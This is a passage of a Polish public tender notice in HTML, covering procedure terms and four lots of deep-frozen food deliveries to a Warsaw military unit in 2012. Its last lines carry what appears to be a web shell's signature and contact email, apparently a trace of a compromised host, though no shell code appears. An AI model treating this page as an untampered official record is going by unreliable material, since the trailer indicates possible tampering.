pozostałych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3. Na podstawie art. 144 ustawy Pzp, w przypadkach niezależnych od Zamawiającego, zastrzega się dokonanie zmian treści umowy w zakresie: 3.1. terminu zawarcia umowy; 3.2. okresu świadczenia - a tym samym ilości przewidzianych w ofercie (adekwatnym do planowanego terminu w przypadkach świadczeń okresowych); 3.3. zmiany miejsca świadczenia; 3.4. z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego, 3.5. z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach. 4. Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.2rblog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego 04-470 Warszawa, ul. Marsa 110, budynek nr 1, pokój nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2012 godzina 09:00, miejsce: Kancelaria ogólna Zamawiającego-budynek nr 3 pokój nr 8, lub przesłać na adres Zamawiającego:Jednostka Wojskowa 4226, 04-470 Warszawa, ul. Marsa...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - dostaw produktów głęboko mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów głęboko mrożonych w ilościach: 
Zadanie nr 1
1	Flaki zamrożone	kg	33
2	Pierogi z mięsem zamrożone	kg	362
3	Naleśniki z serem zamrożone	kg	166
4	Krokiety z mięsem zamrożone	kg	148
5	Pyzy ziemniaczane z mięsem zamrożone	kg	365
6	Gołąbki zamrożone	kg	304
7	Kapusta brukselska zamrożona	kg	233
8	Fasolka szparagowa zamrożona	kg	271
9	Różyczki kalafiora zamrożone	kg	275
10	Mieszanka warzywa II składnikowa zamrożona	kg	333
11	Mieszanka warzywna III składnikowa zamrożona	kg	304
12	Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.33.24.00-8, 15.33.11.70-9, 15.31.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa produktów głęboko mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów głęboko mrożonych w ilościach: 
Zadanie nr 2
Flaki zamrożone	kg	67;
Pierogi z mięsem zamrożone	kg	99;
Pierogi z kapustą i grzybami zamrożone	kg	47;
Pierogi z serem zamrożone	kg	47
Knedle owocowe zamrożone	kg	47;
Uszka z kapustą i grzybami zamrożone	kg	20;
Naleśniki z serem zamrożone	kg	67;
Naleśniki z owocami zamrożone	kg	67;
Krokiety z kapustą i grzybami zamrożone	kg	67;
Krokiety z mięsem zamrożone	kg	67;
Pyzy ziemniaczane z mięsem zamrożone	kg	97;
Gołąbki zamrożone	kg	33;
Truskawka zamrożona	kg	17;
Czarna porzeczka zamrożone	kg	33;
Śliwka zamrożona	kg	33;
Kapusta brukselska zamrożona	kg	70;
Fasolka szparagowa zamrożona	kg	70;
Różyczki kalafiora zamrożone	kg	150;
Mieszanka warzywa II składnikowa zamrożona	kg	37;
Mieszanka warzywna III składnikowa zamrożona	kg	50;
Szpinak zamrożony	kg	73;
Paszteciki drożdżowe z mięsem zamrożone	kg	23;
Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	23;
Paszteciki drożdżowe z pieczarkami i serem zamrożone	kg	23;
Pyzy ziemniaczane zamrożone	kg	67;
Kluski śląskie zamrożone	kg	47;
Kopytka zamrożone	kg	100;
Frytki zamrożone	kg	33;
Bigos zamrożony	kg	33;
Kotlet mielony wieprzowo-wołowy zamrożony	kg	33;
Sznycel wieprzowy zamrożony	kg	33;
Sznycel drobiowy zamrożony	kg	33;
Kotlet schabowy panierowany zamrożony	kg	33;
Kotlet de vollaile zamrożony	kg	33;
Kotlet z piersi  kurczaka panierowany zamrożony	kg	33;
Roladka z kurczaka parzona	kg	33;
Udziec z kurczaka panierowany zamrożony	kg	33;
Fasolka po bretońsku zamrożona	kg	33;
Gulasz wieprzowy zamrożony	kg	33;
Gulasz wołowy zamrożony	kg	33;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.33.24.00-8, 15.33.11.70-9, 15.31.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - dostawa produktów głęboko mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów głęboko mrożonych w ilościach: 
Zadanie nr 3
Flaki zamrożone	kg	250;
Pierogi z mięsem zamrożone	kg	417;
Pierogi z kapustą i grzybami zamrożone	kg	30;
Pierogi z serem zamrożone	kg	167;
Uszka z kapustą i grzybami zamrożone	kg	20;
Naleśniki z serem zamrożone	kg	500;
Krokiety z kapustą i grzybami zamrożone	kg	50;
Krokiety z mięsem zamrożone	kg	250;
Pyzy ziemniaczane z mięsem zamrożone	kg	500;
Gołąbki zamrożone	kg	167;
Truskawka zamrożona	kg	467;
Czarna porzeczka zamrożone	kg	550;
Śliwka zamrożona	kg	383;
Kapusta brukselska zamrożona	kg	333;
Fasolka szparagowa zamrożona	kg	500;
Różyczki kalafiora zamrożone	kg	750;
Mieszanka warzywa II składnikowa zamrożona	kg	834;
Mieszanka warzywna III składnikowa zamrożona	kg	667;
Szpinak zamrożony	kg	83;
Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	10;
Paszteciki drożdżowe z pieczarkami i serem zamrożone	kg	83;
Kluski śląskie zamrożone	kg	83;
Kopytka zamrożone	kg	167;
Frytki zamrożone	kg	333;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.33.24.00-8, 15.33.11.70-9, 15.31.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 - dostawa produktów głęboko mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów głęboko mrożonych w ilościach:
Zadanie Nr 4
 1	Flaki zamrożone	kg	577;
2	Pierogi z mięsem zamrożone	kg	416;
3	Pierogi z kapustą i grzybami zamrożone	kg	267;
4	Pierogi z serem zamrożone	kg	216;
5	Knedle owocowe zamrożone	kg	243;
6	Uszka z kapustą i grzybami zamrożone	kg	30;
7	Naleśniki z serem zamrożone	kg	453;
8	Naleśniki z owocami zamrożone	kg	283;
9	Krokiety z kapustą i grzybami zamrożone	kg	416;
10	Krokiety z mięsem zamrożone	kg	449;
11	Pyzy ziemniaczane z mięsem zamrożone	kg	333;
12	Gołąbki zamrożone	kg	430;
13	Truskawka zamrożona	kg	446;
14	Czarna porzeczka zamrożone	kg	289;
15	Śliwka zamrożona	kg	73;
16	Kapusta brukselska zamrożona	kg	243;
17	Fasolka szparagowa zamrożona	kg	383;
18	Różyczki kalafiora zamrożone	kg	490;
19	Mieszanka warzywa II składnikowa zamrożona	kg	397;
20	Mieszanka warzywna III składnikowa zamrożona	kg	397;
21	Szpinak zamrożony	kg	77;
22	Paszteciki drożdżowe z mięsem zamrożone	kg	113;
23	Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	113;
24	Paszteciki drożdżowe z pieczarkami i serem zamrożone	kg	113;
25	Pyzy ziemniaczane zamrożone	kg	127;
26	Kluski śląskie zamrożone	kg	466;
27	Kopytka zamrożone	kg	406;
28	Frytki zamrożone	kg	457;
29	Bigos zamrożony	kg	33;
30	Kotlet mielony wieprzowo-wołowy zamrożony	kg	17;
31	Sznycel wieprzowy zamrożony	kg	114;
32	Sznycel drobiowy zamrożony	kg	114;
33	Kotlet schabowy panierowany zamrożony	kg	114;
34	Kotlet de vollaile zamrożony	kg	114;
35	Kotlet z piersi  kurczaka panierowany zamrożony	kg	100;
36	Roladka z kurczaka parzona	kg	17;
37	Udziec z kurczaka panierowany zamrożony	kg	97;
38	Fasolka po bretońsku zamrożona	kg	33;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.33.24.00-8, 15.33.11.70-9, 15.31.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com